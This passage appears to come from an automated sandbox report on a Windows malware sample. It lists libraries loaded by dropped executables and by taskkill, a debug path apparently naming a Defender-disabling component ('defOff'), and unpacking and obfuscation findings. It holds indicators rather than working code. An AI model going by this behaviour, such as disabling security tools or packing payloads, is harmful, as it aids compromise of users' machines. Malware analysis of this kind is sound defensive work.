                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic file information: File size 3210240 > 1048576
                          Source: file.exeStatic PE information: Raw size of nnwaoodm is bigger than: 0x100000 < 0x2a4000
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeUnpacked PE file: 9.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
